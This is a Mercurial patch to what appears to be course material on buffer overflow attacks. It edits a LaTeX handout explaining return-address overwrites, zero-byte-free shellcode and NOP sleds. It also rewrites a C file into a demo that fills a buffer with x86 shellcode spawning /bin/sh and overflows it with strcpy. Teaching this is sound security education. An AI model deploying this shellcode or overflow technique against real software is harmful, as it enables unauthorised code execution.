# HG changeset patch # User Christian Urban # Date 1412936783 -3600 # Node ID 603cbd28e9881e77774ef2dd32a7a49ea5902bfc # Parent ea921d6a18191cf6549ac9c1d3bd663788dd9094 updated diff -r ea921d6a1819 -r 603cbd28e988 handouts/ho03.pdf Binary file handouts/ho03.pdf has changed diff -r ea921d6a1819 -r 603cbd28e988 handouts/ho03.tex --- a/handouts/ho03.tex Thu Oct 09 23:12:10 2014 +0100 +++ b/handouts/ho03.tex Fri Oct 10 11:26:23 2014 +0100 @@ -67,11 +67,11 @@ programmer explicitly allocates. For us the most interesting region is the stack, which contains data mostly associated with the control flow of the program. Notice that the stack -grows from a higher addresses to lower addresses. That means -that older items on the stack will be stored behind, or after, -newer items. Let's look a bit closer what happens with the -stack when a program is running. Consider the following simple -C program. +grows from higher addresses to lower addresses (i.e.~from the +back to the front). That means that older items on the stack +will be stored behind, or after, newer items. Let's look a bit +closer what happens with the stack when a program is running. +Consider the following simple C program. \lstinputlisting[language=C]{../progs/example1.c} @@ -144,7 +144,7 @@ \pcode{gcc} generate assembly instructions if you call it with the \pcode{-S} option, for example \pcode{gcc -S out in.c}\;. Or you can look at this code by using the debugger. How to do -this will be explained later.}. +this will be explained later.} \begin{center}\small \begin{tabular}[t]{@{}c@{\hspace{8mm}}c@{}} @@ -172,8 +172,8 @@ to the function \pcode{main} to the the instruction just after the call to \pcode{foo}, that is Line 9. 
-Another part of the ``conspiracy'' is that library functions -in C look typically as follows: +Another part of the ``conspiracy'' of buffer overflow attacks +is that library functions in C look typically as follows: \begin{center} \lstinputlisting[language=C,numbers=none]{../progs/app5.c} @@ -182,19 +182,23 @@ \noindent This function copies data from a source \pcode{src} to a destination \pcode{dst}. The important point is that it copies the data until it reaches a zero-byte (\code{"\\0"}). +This is a convention of the C language which assumes all +strings are terminated by such a zero-byte. The central idea of the buffer overflow attack is to overwrite -the return address on the stack which designates where the -control flow of the program should resume once the function at -hand has finished its computation. So if we have somewhere in -a function a local a buffer, say +the return address on the stack. This address decides where +the control flow of the program should resume once the +function at hand has finished its computation. So if we +can control this address, then we can modify the control +flow of a program. To launch an attack we need +somewhere in a function a local buffer, say \begin{center} \code{char buf[8];} \end{center} -\noindent -then the corresponding stack will look as follows +\noindent which is filled by some user input. The +corresponding stack of such a function will look as follows \begin{center} \begin{tikzpicture}[scale=0.65] @@ -253,19 +257,22 @@ buffer, is stored on the stack before the older items, like return address and arguments. If it had be the other way around, then such an overwriting by overflowing a local buffer -would just not work. +would just not work. If only the designers of C had been able +to foresee what headaches their way of arranging the stack +would cause in a time where computers are accessible from +everywhere. What the outcome of such an attack is can be illustrated with the code shown in Figure~\ref{C2}. 
Under ``normal operation'' this program ask for a login-name and a password. Both of which are stored in \code{char} buffers of length 8. The function \pcode{match} tests whether two such buffers contain -the same. If yes, then the function lets you ``in'' (by -printing \pcode{Welcome}). If not, it denies access (by +the same content. If yes, then the function lets you ``in'' +(by printing \pcode{Welcome}). If not, it denies access (by printing \pcode{Wrong identity}). The vulnerable function is \code{get_line} in Lines 11 to 19. This function does not take any precautions about the buffer of 8 characters being filled -beyond this 8-character-limit. Let us suppose the login name +beyond its 8-character-limit. Let us suppose the login name is \pcode{test}. Then the buffer overflow can be triggered with a specially crafted string as password: @@ -277,10 +284,10 @@ function \pcode{welcome()}. This means even with this input (where the login name and password clearly do not match) the program will still print out \pcode{Welcome}. The only -information we need for this attack is to know where the -function \pcode{welcome()} starts in memory. This information -can be easily obtained by starting the program inside the -debugger and disassembling this function. +information we need for this attack to work is to know where +the function \pcode{welcome()} starts in memory. This +information can be easily obtained by starting the program +inside the debugger and disassembling this function. \begin{lstlisting}[numbers=none,language={[x86masm]Assembler}, morekeywords={movl,movw}] @@ -310,7 +317,7 @@ \begin{figure}[p] \lstinputlisting[language=C]{../progs/C2.c} -\caption{A suspicious login implementation.\label{C2}} +\caption{A vulnerable login implementation.\label{C2}} \end{figure} This kind of attack was very popular with commercial programs @@ -326,15 +333,14 @@ Unfortunately, much more harm can be caused by buffer overflow attacks. 
This is achieved by injecting code that will be run once the return address is appropriately modified. Typically -the code that will be injected is for running a shell. This -gives the attacker the ability to run programs on the target -machine and have a good look around, provided the attacked -process was not already running as root.\footnote{In that case -the attacker would do already congratulate him or herself to -another computer under full control.} In order to be send as -part of the string that is overflowing the buffer, we need the -code to be represented as a sequence of characters. For -example +the code that will be injected starts a shell. This gives the +attacker the ability to run programs on the target machine and +to have a good look around, provided the attacked process was not +already running as root.\footnote{In that case the attacker +would already congratulate him or herself on another +computer under full control.} In order to be sent as part of +the string that is overflowing the buffer, we need the code to +be represented as a sequence of characters. For example \lstinputlisting[language=C,numbers=none]{../progs/o1.c} @@ -345,7 +351,7 @@ string ready-made---just a quick Google query away. Second, tools like the debugger can help us again. We can just write the code we want in C, for example this would be the program -for starting a shell +for starting a shell: \lstinputlisting[language=C,numbers=none]{../progs/shell.c} @@ -361,22 +367,31 @@ post-processing phase is needed to rewrite the machine code in a way that it does not contain any zero bytes. This is like some works of literature that have been written so that the -letter 'i', for example, is avoided. For rewriting the machine -code, you might need to use clever tricks like +letter e, for example, is avoided. 
The technical term for such +a literary work is \emph{lipogram}.\footnote{The most +famous example of a lipogram is a 50,000-word novel titled +Gadsby, see \url{https://archive.org/details/Gadsby}.} For +rewriting the machine code, you might need to use clever +tricks like \begin{lstlisting}[numbers=none,language={[x86masm]Assembler}] xor %eax, %eax \end{lstlisting} -\noindent This instruction does not contain any zero byte when -encoded, but produces a zero byte on the stack when run. +\noindent This instruction does not contain any zero-byte when +encoded as a string, but produces a zero-byte on the stack when +run. -Having removed the zero bytes we can craft the string that -will be send to the target computer. It is typically of the -form +Having removed the zero-bytes we can craft the string that +will be sent to the target computer. This of course requires +that the buffer we are trying to attack can at least contain +the shellcode we want to run. But as you can see this is only +47 bytes, which is a very low bar to jump over. More +formidable is the task of finding the right address to jump +to. The string is typically of the form \begin{center} - \begin{tikzpicture}[scale=0.7] + \begin{tikzpicture}[scale=0.6] \draw[line width=1mm] (-2, -1) rectangle (2,3); \draw[line width=1mm] (-2,1.9) -- (2,1.9); \draw (0,2.5) node {\large\tt shell code}; @@ -388,22 +403,18 @@ \end{tikzpicture} \end{center} -\noindent This of course requires that the buffer we are -trying to attack can at least contain the shellcode we want to -run. But as you can see this is only 47 bytes, which is a very -low bar to jump over. More formidable is the choice of finding -the right address to jump to. As indicated in the picture we -need to be very precise with the address with which we will -overwrite the buffer. It has to be precisely the first byte of -the shellcode. 
While this is easy with the help of a debugger -(as seen before), we typically cannot run anything on the -machine yet we target. And the address is very specific to the -setup of the target machine. One way of finding out what the -right address is is to try out one by one until we get lucky. -With the large memories available today, however, the odds are -long. And if we try out too many possible candidates too -quickly, we might be detected by the system administrator of -the target system. +\noindent where we need to be very precise with the address +with which we will overwrite the buffer. It has to be +precisely the first byte of the shellcode. While this is easy +with the help of a debugger (as seen before), we typically +cannot yet run anything, including a debugger, on the machine +we target. And the address is very specific to the setup of +the target machine. One way of finding out what the right +address is is to try out every possible address one by +one until we get lucky. With the large memories available +today, however, the odds are long. And if we try out too many +possible candidates too quickly, we might be detected by the +system administrator of the target system. We can improve our odds considerably by following a clever trick. 
Instead of adding the shellcode at the beginning of the @@ -411,10 +422,12 @@ the buffer, for example \begin{center} - \begin{tikzpicture}[scale=0.7] + \begin{tikzpicture}[scale=0.6] + \draw[gray!50,fill=gray!50] (-2,0.3) rectangle (2,3); \draw[line width=1mm] (-2, -1) rectangle (2,3); - \draw[line width=1mm] (-2,1.9) -- (2,1.9); - \draw (0,2.5) node {\large\tt shell code}; + \draw[line width=1mm] (-2,0.3) -- (2,0.3); + \draw[line width=1mm] (-2,-0.7) -- (2,-0.7); + \draw (0,-0.2) node {\large\tt shell code}; \draw[line width=1mm,fill=black] (0.3, -1) rectangle (2,-0.7); \draw (-2, 3) node[anchor=north east] {\LARGE \color{codegreen}{``}}; \draw ( 2,-0.9) node[anchor=west] {\LARGE\color{codegreen}{''}}; @@ -422,16 +435,23 @@ \end{center} \noindent Then we can fill up the gray part of the string with -a \pcode{NOP} operation. The code for this operation is +\pcode{NOP} operations. The code for this operation is \code{\\0x90}. It is available on every architecture and its -purpose it to to nothing apart from waiting a small amount of -time. If we now use an address that lets us jump to any -address in the gray area we are done. The target machine will -execute these \pcode{NOP} operations until it reaches the +purpose in a CPU is to do nothing apart from waiting a small +amount of time. If we now use an address that lets us jump to +any address in the gray area we are done. The target machine +will execute these \pcode{NOP} operations until it reaches the shellcode. A moment of thought can convince you that this -trick can hugely improve our odds of finding the right -address---depending on the size of the buffer, it might -only take a few tries to get the shellcode to run. +trick can hugely improve our odds of finding the right +address---depending on the size of the buffer, it might only +take a few tries to get the shellcode to run. And then +we are in. The code for such an attack is shown in +Figure~\ref{overflow}. 
+ +\begin{figure}[p] +\lstinputlisting[language=C]{../progs/overflow.c} +\caption{Overwriting a buffer with a payload.\label{overflow}} +\end{figure} \bigskip\bigskip \subsubsection*{A Crash-Course for GDB} diff -r ea921d6a1819 -r 603cbd28e988 progs/C3.c --- a/progs/C3.c Thu Oct 09 23:12:10 2014 +0100 +++ b/progs/C3.c Fri Oct 10 11:26:23 2014 +0100 @@ -1,19 +1,20 @@ -#include -#include - -// simple program used for a bufferflow attack -// -// for installation notes see C0.c -// -// can be called with -// -// ./C3 `./args3` - -main(int argc, char **argv) -{ - char buffer[80]; - - strcpy(buffer, argv[1]); - - return 1; -} +char shellcode[] = + "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" + "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" + "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" + "\xff\xff/bin/sh"; +char large_string[128]; + +void main() { + char buffer[96]; + int i; + long *long_ptr = (long *) large_string; + + for (i = 0; i < 32; i++) + *(long_ptr + i) = (int) buffer; + + for (i = 0; i < strlen(shellcode); i++) + large_string[i] = shellcode[i]; + + strcpy(buffer,large_string); +}